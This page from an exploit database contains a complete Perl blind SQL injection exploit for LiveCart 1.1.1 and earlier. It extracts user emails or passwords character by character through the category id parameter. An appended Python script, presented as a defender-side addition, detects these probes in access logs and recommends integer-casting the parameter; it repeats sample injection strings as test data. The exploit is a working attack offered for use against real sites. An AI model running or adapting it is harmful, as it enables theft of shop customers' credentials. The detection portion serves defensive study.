0day.today - Biggest Exploit Database in the World.
LiveCart <= 1.1.1 (category id) Blind SQL Injection Exploit
```perl
#!/usr/bin/perl -w

use LWP::UserAgent;

#-----------------------------------------------------------------------------------------------#
# scripts      : livecart Remote Blind Sql Injection                                            #
# scripts site : http://www.livecart.com                                                        #
#                                                                                               #
# Discovered                                                                                    #
# By           : irvian                                                                         #
#                                                                                               #
# Thanks To                                                                                     #
# friend       : str0ke, nyubi, ibnusina, arioo, jipank, ifx, karet, bluespy and all my friend  #
#-----------------------------------------------------------------------------------------------#
# sample :                                                                                      #
# http://demo.livecart.com                                                                      #
#-----------------------------------------------------------------------------------------------#

print "\r\n[+]----------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]Livecart [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]irvian[dot]cn [+]\r\n";
print "[+]----------------------[+]\n\r";

if (@ARGV < 3){
die "
Cara Mengunakan : perl $0 host option userid
Keterangan
host : http://victim.com atau victim.com
Option : pilih 1 untuk mencari email dan pilih 2 untuk mencari password
userid : Limit
Contoh : perl $0 http://victim.com 1 1
\n";}

$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];

if ($option eq 1){
    syswrite(STDOUT, "email: ", 7);}
elsif ($option eq 2){
    syswrite(STDOUT, "password: ", 10);}

for($i = 1; $i <= 32; $i++){
    $f = 0;
    $n = 32;
    while(!$f && $n <= 57)
    {
        if(&blind($url, $option, $id, $i, $n, $id)){
            $f = 1;
            syswrite(STDOUT, chr($n), 1);
        }
        $n++;
    }
    if ($f==0){
        $n = 97;
        while(!$f && $n <= 122)
        {
            if(&blind($url, $option, $id, $i, $n, $id)){
                $f = 1;
                syswrite(STDOUT, chr($n), 1);
            }
            $n++;
        }
    }
}
print "\n[+]finish Execution Exploit\n";

sub blind {
    my $site = $_[0];
    my $op = $_[1];
    my $id = $_[2];
    my $i = $_[3];
    my $n = $_[4];
    my $r = $_[5];
    if ($op eq 1){$klm = "email";}
    elsif ($op eq 2){$klm = "password";}
    $site =~ s/^http:\/\///;
    my $url = "http://"."$site"."/category?id=1"."%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."User"."%20LIMIT%20"."$r".",1"."),"."$i".",1)=CHAR("."$n".")";
    my $browser = &zero($url);
    if ($browser !~ /Error Code 500/gi){
        return 1;
    }
    else {
        return 0;
    }
}

sub zero($){
    my $spy = $_[0];
    my $ua = LWP::UserAgent->new;
    $ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    my $res = $ua->get($spy);
    my @r = $res->content;
    $page="@r";
    return $page;}

# 0day.today [2024-07-02] #
```
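A defender-side check for the request pattern the script above generates, as an added example that is not part of the original page: it parses access-log lines, flags non-numeric `id` values on `/category`, and groups `SUBSTRING((SELECT ...),pos,1)=CHAR(n)` probes per client. The log lines, client addresses, status codes and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; addresses are documentation ranges, statuses are assumed.
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - - [02/Jul/2024:10:00:01 +0000] "GET /category?id=1%20AND%20SUBSTRING((SELECT%20email%20FROM%20User%20LIMIT%201,1),1,1)=CHAR(97) HTTP/1.1" 500 312',
    '198.51.100.7 - - [02/Jul/2024:10:00:01 +0000] "GET /category?id=1%20AND%20SUBSTRING((SELECT%20email%20FROM%20User%20LIMIT%201,1),1,1)=CHAR(98) HTTP/1.1" 200 9120',
    '198.51.100.7 - - [02/Jul/2024:10:00:02 +0000] "GET /category?id=1%20AND%20SUBSTRING((SELECT%20email%20FROM%20User%20LIMIT%201,1),2,1)=CHAR(48) HTTP/1.1" 500 312',
    '198.51.100.7 - - [02/Jul/2024:10:00:02 +0000] "GET /category?id=1%20AND%20SUBSTRING((SELECT%20email%20FROM%20User%20LIMIT%201,1),2,1)=CHAR(49) HTTP/1.1" 200 9120',
    '203.0.113.20 - - [02/Jul/2024:10:00:03 +0000] "GET /category?id=12 HTTP/1.1" 200 9120',
    '203.0.113.21 - - [02/Jul/2024:10:00:04 +0000] "GET /category?id=12abc HTTP/1.1" 500 312',
])

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
# Boolean-blind probe: one character of a sub-select compared against CHAR(n).
PROBE = re.compile(
    r"SUBSTRING\s*\(\s*\(\s*SELECT\s+(\w+)\s+FROM\s+(\w+).*?\)"
    r"\s*,\s*(\d+)\s*,\s*1\s*\)\s*=\s*CHAR\s*\(\s*(\d+)\s*\)", re.I | re.S)

def analyse(log_text, path="/category", param="id"):
    """Return per-client findings for non-numeric values of `param` on `path`."""
    findings = defaultdict(lambda: {"non_numeric": 0, "probes": set(), "columns": set()})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if parts.path != path:
            continue
        for value in parse_qs(parts.query).get(param, []):  # parse_qs URL-decodes
            if value.isdigit():
                continue  # a well-formed category id, nothing to report
            entry = findings[client]
            entry["non_numeric"] += 1
            p = PROBE.search(value)
            if p:
                entry["columns"].add(f"{p.group(2)}.{p.group(1)}")
                entry["probes"].add((int(p.group(3)), int(p.group(4))))
    return dict(findings)

def suspected_extraction(findings, min_probes=3):
    """Clients that sent at least `min_probes` distinct (position, char code) probes."""
    return sorted(c for c, e in findings.items() if len(e["probes"]) >= min_probes)

if __name__ == "__main__":
    print(suspected_extraction(analyse(SAMPLE_LOG)))
```

Rejecting or integer-casting `id` before it reaches the query removes the injection point; the log check only shows which clients have already probed it and which columns they targeted.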